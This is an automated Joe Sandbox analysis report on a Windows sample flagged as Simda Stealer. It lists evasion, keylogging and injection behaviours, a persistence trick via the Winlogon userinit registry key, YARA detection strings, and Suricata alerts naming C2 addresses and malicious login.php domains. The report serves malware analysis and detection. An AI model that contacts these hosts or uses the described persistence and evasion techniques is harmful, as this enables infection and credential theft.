Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WlCVLbzNph.exe

Overview

General Information

Sample name:WlCVLbzNph.exe
renamed because original name is a hash value
Original sample name:2caf9f151b88a328475181b2ecce22f90694795f.exe
Analysis ID:1553823
MD5:bb4d08026f4dad460862be3d65fbeddb
SHA1:2caf9f151b88a328475181b2ecce22f90694795f
SHA256:7ef95304b8e240cba2fddbc90e13d5e8fead7dd65c6c2cddc0e11af14198703b
Tags:exeuser-NDA0E
Infos:

Detection

Simda Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WlCVLbzNph.exe (PID: 6788 cmdline: "C:\Users\user\Desktop\WlCVLbzNph.exe" MD5: BB4D08026F4DAD460862BE3D65FBEDDB)
    • svchost.exe (PID: 1736 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 7F7F85F214F3A6B27A5B5FF8F6EC6188)
      • nPtwtzGyOdAtB.exe (PID: 5584 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 764 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 3804 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 2940 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 716 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 1364 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 2232 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7988 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 720 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 6644 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 4864 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 7160 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 2688 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 1992 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • nPtwtzGyOdAtB.exe (PID: 2800 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 7128 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 6304 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 728 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 6048 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 1504 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 712 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • nPtwtzGyOdAtB.exe (PID: 5636 cmdline: "C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
0000001C.00000002.1915085532.0000000001010000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x48bf4:$a1: name=%s&port=%u
  • 0x483c8:$a2: data_inject
  • 0x4857c:$a3: keylog.txt
  • 0x4825d:$a4: User-agent: %s]]]
  • 0x48d44:$a5: %s\%02d.bmp
00000002.00000003.1991774796.000000000F280000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
00000014.00000002.1898425199.0000000001400000.00000040.00000001.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x47df4:$a1: name=%s&port=%u
  • 0x475c8:$a2: data_inject
  • 0x4777c:$a3: keylog.txt
  • 0x4745d:$a4: User-agent: %s]]]
  • 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.1985170745.000000000F280000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
Click to see the 99 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
2.3.svchost.exe.886000.4.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x477f4:$a1: name=%s&port=%u
  • 0x46fc8:$a2: data_inject
  • 0x4717c:$a3: keylog.txt
  • 0x46e5d:$a4: User-agent: %s]]]
  • 0x47944:$a5: %s\%02d.bmp
2.3.svchost.exe.f280000.32.raw.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.f280000.35.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp
20.2.nPtwtzGyOdAtB.exe.13a2000.1.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.19.unpackWindows_Trojan_Zeus_e51c60d7Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.unknown
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp
Click to see the 179 entries

Sigma Signatures

System Summary

barindex
Sigma detected: Files With System Process Name In Unsuspected Locations
Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\WlCVLbzNph.exe, ProcessId: 6788, TargetFilename: C:\Windows\apppatch\svchost.exe
Sigma detected: System File Execution Location Anomaly
Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WlCVLbzNph.exe", ParentImage: C:\Users\user\Desktop\WlCVLbzNph.exe, ParentProcessId: 6788, ParentProcessName: WlCVLbzNph.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1736, ProcessName: svchost.exe
Sigma detected: CurrentVersion NT Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 1736, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Sigma detected: Uncommon Svchost Parent Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WlCVLbzNph.exe", ParentImage: C:\Users\user\Desktop\WlCVLbzNph.exe, ParentProcessId: 6788, ParentProcessName: WlCVLbzNph.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1736, ProcessName: svchost.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\WlCVLbzNph.exe", ParentImage: C:\Users\user\Desktop\WlCVLbzNph.exe, ParentProcessId: 6788, ParentProcessName: WlCVLbzNph.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1736, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:19.426213+010020229301A Network Trojan was detected172.202.163.200443192.168.2.849738TCP
2024-11-11T18:25:04.870772+010020229301A Network Trojan was detected4.175.87.197443192.168.2.862057TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:05.586777+010020181411A Network Trojan was detected3.94.10.3480192.168.2.849712TCP
2024-11-11T18:24:05.593017+010020181411A Network Trojan was detected44.221.84.10580192.168.2.849715TCP
2024-11-11T18:24:10.883804+010020181411A Network Trojan was detected18.208.156.24880192.168.2.849724TCP
2024-11-11T18:24:22.649459+010020181411A Network Trojan was detected52.34.198.22980192.168.2.853598TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:05.586777+010020377711A Network Trojan was detected3.94.10.3480192.168.2.849712TCP
2024-11-11T18:24:05.593017+010020377711A Network Trojan was detected44.221.84.10580192.168.2.849715TCP
2024-11-11T18:24:10.883804+010020377711A Network Trojan was detected18.208.156.24880192.168.2.849724TCP
2024-11-11T18:24:22.649459+010020377711A Network Trojan was detected52.34.198.22980192.168.2.853598TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:04.962880+010020210221A Network Trojan was detected1.1.1.153192.168.2.853944UDP
2024-11-11T18:24:56.419947+010020210221A Network Trojan was detected1.1.1.153192.168.2.855775UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-11T18:24:05.285685+010028048521Malware Command and Control Activity Detected192.168.2.84970518.208.156.24880TCP
2024-11-11T18:24:05.431780+010028048521Malware Command and Control Activity Detected192.168.2.84970823.253.46.6480TCP
2024-11-11T18:24:05.552641+010028048521Malware Command and Control Activity Detected192.168.2.849710199.59.243.22780TCP
2024-11-11T18:24:05.579738+010028048521Malware Command and Control Activity Detected192.168.2.8497123.94.10.3480TCP
2024-11-11T18:24:05.580932+010028048521Malware Command and Control Activity Detected192.168.2.84971375.2.71.19980TCP
2024-11-11T18:24:05.585920+010028048521Malware Command and Control Activity Detected192.168.2.84971544.221.84.10580TCP
2024-11-11T18:24:05.586456+010028048521Malware Command and Control Activity Detected192.168.2.84971444.221.84.10580TCP
2024-11-11T18:24:05.597685+010028048521Malware Command and Control Activity Detected192.168.2.849711208.100.26.24580TCP
2024-11-11T18:24:05.709221+010028048521Malware Command and Control Activity Detected192.168.2.849711208.100.26.24580TCP
2024-11-11T18:24:05.876538+010028048521Malware Command and Control Activity Detected192.168.2.849707154.212.231.8280TCP
2024-11-11T18:24:05.894705+010028048521Malware Command and Control Activity Detected192.168.2.84971785.17.31.8280TCP
2024-11-11T18:24:05.899510+010028048521Malware Command and Control Activity Detected192.168.2.84971623.253.46.6480TCP
2024-11-11T18:24:06.504059+010028048521Malware Command and Control Activity Detected192.168.2.849709188.114.96.380TCP
2024-11-11T18:24:06.504085+010028048521Malware Command and Control Activity Detected192.168.2.849707154.212.231.8280TCP
2024-11-11T18:24:06.504097+010028048521Malware Command and Control Activity Detected192.168.2.84971985.17.31.8280TCP
2024-11-11T18:24:06.744166+010028048521Malware Command and Control Activity Detected192.168.2.84971875.2.71.199443TCP
2024-11-11T18:24:07.324446+010028048521Malware Command and Control Activity Detected192.168.2.849706199.191.50.8380TCP
2024-11-11T18:24:07.933006+010028048521Malware Command and Control Activity Detected192.168.2.849720188.114.96.3443TCP
2024-11-11T18:24:08.341643+010028048521Malware Command and Control Activity Detected192.168.2.849709188.114.96.380TCP
2024-11-11T18:24:10.021818+010028048521Malware Command and Control Activity Detected192.168.2.849721188.114.96.3443TCP
2024-11-11T18:24:10.543538+010028048521Malware Command and Control Activity Detected192.168.2.84972213.248.169.4880TCP
2024-11-11T18:24:10.877685+010028048521Malware Command and Control Activity Detected192.168.2.84972418.208.156.24880TCP
2024-11-11T18:24:10.885259+010028048521Malware Command and Control Activity Detected192.168.2.8497253.94.10.3480TCP
2024-11-11T18:24:11.029523+010028048521Malware Command and Control Activity Detected192.168.2.849723188.114.97.380TCP
2024-11-11T18:24:11.403094+010028048521Malware Command and Control Activity Detected192.168.2.849726103.150.10.4880TCP
2024-11-11T18:24:12.460365+010028048521Malware Command and Control Activity Detected192.168.2.849726103.150.10.4880TCP
2024-11-11T18:24:13.477876+010028048521Malware Command and Control Activity Detected192.168.2.849727188.114.97.3443TCP
2024-11-11T18:24:13.833912+010028048521Malware Command and Control Activity Detected192.168.2.849723188.114.97.380TCP
2024-11-11T18:24:16.088067+010028048521Malware Command and Control Activity Detected192.168.2.849729188.114.97.3443TCP
2024-11-11T18:24:16.605566+010028048521Malware Command and Control Activity Detected192.168.2.84973076.223.67.18980TCP
2024-11-11T18:24:16.769592+010028048521Malware Command and Control Activity Detected192.168.2.84973164.225.91.7380TCP
2024-11-11T18:24:16.770885+010028048521Malware Command and Control Activity Detected192.168.2.84973244.221.84.10580TCP
2024-11-11T18:24:17.039103+010028048521Malware Command and Control Activity Detected192.168.2.849733103.224.212.21080TCP
2024-11-11T18:24:17.050761+010028048521Malware Command and Control Activity Detected192.168.2.849734103.224.182.25280TCP
2024-11-11T18:24:17.440887+010028048521Malware Command and Control Activity Detected192.168.2.849735154.85.183.5080TCP
2024-11-11T18:24:17.731101+010028048521Malware Command and Control Activity Detected192.168.2.849735154.85.183.5080TCP
2024-11-11T18:24:18.913088+010028048521Malware Command and Control Activity Detected192.168.2.84973964.225.91.7380TCP
2024-11-11T18:24:19.113297+010028048521Malware Command and Control Activity Detected192.168.2.84974172.52.179.17480TCP
2024-11-11T18:24:19.613186+010028048521Malware Command and Control Activity Detected192.168.2.84974272.52.179.17480TCP
2024-11-11T18:24:22.641586+010028048521Malware Command and Control Activity Detected192.168.2.85359852.34.198.22980TCP
2024-11-11T18:24:25.392786+010028048521Malware Command and Control Activity Detected192.168.2.85935744.221.84.10580TCP
2024-11-11T18:24:26.934349+010028048521Malware Command and Control Activity Detected192.168.2.849711208.100.26.24580TCP
2024-11-11T18:24:27.365769+010028048521Malware Command and Control Activity Detected192.168.2.849711208.100.26.24580TCP
2024-11-11T18:24:27.368088+010028048521Malware Command and Control Activity Detected192.168.2.863205199.59.243.22780TCP
2024-11-11T18:24:27.368144+010028048521Malware Command and Control Activity Detected192.168.2.86320623.253.46.6480TCP
2024-11-11T18:24:27.368144+010028048521Malware Command and Control Activity Detected192.168.2.86320785.17.31.8280TCP
2024-11-11T18:24:27.403260+010028048521Malware Command and Control Activity Detected192.168.2.849709188.114.96.380TCP
2024-11-11T18:24:27.425746+010028048521Malware Command and Control Activity Detected192.168.2.849707154.212.231.8280TCP
2024-11-11T18:24:27.462423+010028048521Malware Command and Control Activity Detected192.168.2.86320875.2.71.19980TCP
2024-11-11T18:24:27.808784+010028048521Malware Command and Control Activity Detected192.168.2.86320985.17.31.8280TCP
2024-11-11T18:24:27.878793+010028048521Malware Command and Control Activity Detected192.168.2.86321023.253.46.6480TCP
2024-11-11T18:24:27.912689+010028048521Malware Command and Control Activity Detected192.168.2.849707154.212.231.8280TCP
2024-11-11T18:24:28.359758+010028048521Malware Command and Control Activity Detected192.168.2.86321275.2.71.199443TCP
2024-11-11T18:24:28.944020+010028048521Malware Command and Control Activity Detected192.168.2.863211188.114.96.3443TCP
2024-11-11T18:24:29.830756+010028048521Malware Command and Control Activity Detected192.168.2.849709188.114.96.380TCP
2024-11-11T18:24:31.123927+010028048521Malware Command and Control Activity Detected192.168.2.863213188.114.96.3443TCP
2024-11-11T18:24:31.543636+010028048521Malware Command and Control Activity Detected192.168.2.849726103.150.10.4880TCP
2024-11-11T18:24:31.699421+010028048521Malware Command and Control Activity Detected192.168.2.849723188.114.97.380TCP
2024-11-11T18:24:32.831483+010028048521Malware Command and Control Activity Detected192.168.2.849726103.150.10.4880TCP
2024-11-11T18:24:34.530489+010028048521Malware Command and Control Activity Detected192.168.2.861823188.114.97.3443TCP
2024-11-11T18:24:34.922467+010028048521Malware Command and Control Activity Detected192.168.2.849723188.114.97.380TCP
2024-11-11T18:24:36.952023+010028048521Malware Command and Control Activity Detected192.168.2.861824188.114.97.3443TCP
2024-11-11T18:24:37.303197+010028048521Malware Command and Control Activity Detected192.168.2.849735154.85.183.5080TCP
2024-11-11T18:24:37.589469+010028048521Malware Command and Control Activity Detected192.168.2.861825103.224.182.25280TCP
2024-11-11T18:24:37.628005+010028048521Malware Command and Control Activity Detected192.168.2.861826103.224.212.21080TCP
2024-11-11T18:24:37.871157+010028048521Malware Command and Control Activity Detected192.168.2.849735154.85.183.5080TCP
2024-11-11T18:24:39.913696+010028048521Malware Command and Control Activity Detected192.168.2.86483072.52.179.17480TCP
2024-11-11T18:24:40.447338+010028048521Malware Command and Control Activity Detected192.168.2.84931272.52.179.17480TCP
2024-11-11T18:25:05.332951+010028048521Malware Command and Control Activity Detected192.168.2.862047199.191.50.8380TCP
2024-11-11T18:25:54.329448+010028048521Malware Command and Control Activity Detected192.168.2.85352085.17.31.8280TCP
2024-11-11T18:25:54.352111+010028048521Malware Command and Control Activity Detected192.168.2.853521199.59.243.22780TCP
2024-11-11T18:25:54.360416+010028048521Malware Command and Control Activity Detected192.168.2.853519208.100.26.24580TCP
2024-11-11T18:25:54.378278+010028048521Malware Command and Control Activity Detected192.168.2.85352223.253.46.6480TCP
2024-11-11T18:25:54.385974+010028048521Malware Command and Control Activity Detected192.168.2.85352675.2.71.19980TCP
2024-11-11T18:25:54.576801+010028048521Malware Command and Control Activity Detected192.168.2.853519208.100.26.24580TCP
2024-11-11T18:25:54.823609+010028048521Malware Command and Control Activity Detected192.168.2.853523154.212.231.8280TCP
2024-11-11T18:25:54.888954+010028048521Malware Command and Control Activity Detected192.168.2.85353023.253.46.6480TCP
2024-11-11T18:25:55.030079+010028048521Malware Command and Control Activity Detected192.168.2.85352785.17.31.8280TCP
2024-11-11T18:25:55.151694+010028048521Malware Command and Control Activity Detected192.168.2.85353175.2.71.199443TCP
2024-11-11T18:25:55.202595+010028048521Malware Command and Control Activity Detected192.168.2.853523154.212.231.8280TCP
2024-11-11T18:25:55.335714+010028048521Malware Command and Control Activity Detected192.168.2.853524188.114.96.380TCP
2024-11-11T18:25:56.561549+010028048521Malware Command and Control Activity Detected192.168.2.853540188.114.96.3443TCP
2024-11-11T18:25:57.002925+010028048521Malware Command and Control Activity Detected192.168.2.853524188.114.96.380TCP
2024-11-11T18:25:58.211626+010028048521Malware Command and Control Activity Detected192.168.2.853543188.114.96.3443TCP
2024-11-11T18:25:58.781074+010028048521Malware Command and Control Activity Detected192.168.2.8535453.94.10.3480TCP
2024-11-11T18:25:58.891700+010028048521Malware Command and Control Activity Detected192.168.2.85354613.248.169.4880TCP
2024-11-11T18:25:58.996976+010028048521Malware Command and Control Activity Detected192.168.2.85354718.208.156.24880TCP
2024-11-11T18:25:59.018402+010028048521Malware Command and Control Activity Detected192.168.2.853544188.114.96.380TCP
2024-11-11T18:25:59.709522+010028048521Malware Command and Control Activity Detected192.168.2.853548103.150.10.4880TCP
2024-11-11T18:26:00.942488+010028048521Malware Command and Control Activity Detected192.168.2.853549188.114.96.3443TCP
2024-11-11T18:26:01.317843+010028048521Malware Command and Control Activity Detected192.168.2.853551103.150.10.4880TCP
2024-11-11T18:26:01.737331+010028048521Malware Command and Control Activity Detected192.168.2.853552188.114.96.380TCP
2024-11-11T18:26:03.622314+010028048521Malware Command and Control Activity Detected192.168.2.853554188.114.96.3443TCP
2024-11-11T18:26:04.267660+010028048521Malware Command and Control Activity Detected192.168.2.85355676.223.67.18980TCP
2024-11-11T18:26:04.274948+010028048521Malware Command and Control Activity Detected192.168.2.85355564.225.91.7380TCP
2024-11-11T18:26:04.455826+010028048521Malware Command and Control Activity Detected192.168.2.853557103.224.182.25280TCP
2024-11-11T18:26:04.481004+010028048521Malware Command and Control Activity Detected192.168.2.85797144.221.84.10580TCP
2024-11-11T18:26:04.548250+010028048521Malware Command and Control Activity Detected192.168.2.857970103.224.212.21080TCP
2024-11-11T18:26:04.993727+010028048521Malware Command and Control Activity Detected192.168.2.857972154.85.183.5080TCP
2024-11-11T18:26:05.281399+010028048521Malware Command and Control Activity Detected192.168.2.857972154.85.183.5080TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: WlCVLbzNph.exeAvira: detected
Antivirus detection for URL or domain
Source: http://puvymul.com/http://puvymul.com/Avira URL Cloud: Label: malware
Source: http://qedysov.com/login.phpAvira URL Cloud: Label: malware
Source: http://gaqycyz.com/Avira URL Cloud: Label: malware
Source: http://gatypas.com/login.phpAvira URL Cloud: Label: malware
Source: http://pupymol.com/login.phpAvira URL Cloud: Label: malware
Source: http://vojyzyt.com/login.phpAvira URL Cloud: Label: malware
Source: http://vopycoc.com/login.phpAvira URL Cloud: Label: malware
Source: http://qeqykop.com/login.phpAvira URL Cloud: Label: malware
Source: http://vofybic.com/login.phpAvira URL Cloud: Label: malware
Source: http://vocyjet.com/login.phpAvira URL Cloud: Label: malware
